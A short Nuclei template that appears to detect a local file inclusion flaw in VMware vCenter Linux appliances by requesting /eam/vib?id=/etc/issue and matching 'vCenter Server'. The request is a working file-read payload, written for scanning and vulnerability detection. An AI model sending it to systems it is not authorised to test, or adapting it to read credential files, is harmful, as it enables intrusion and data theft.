nuclei-templates/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml

16 lines
295 B
YAML

id: vmware-vcenter-lfi-linux
info:
name: Vmware Vcenter LFI for Linux appliances
author: PR3R00T
severity: high
tags: vmware,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/eam/vib?id=/etc/issue"
matchers:
- type: word
words:
- "vCenter Server"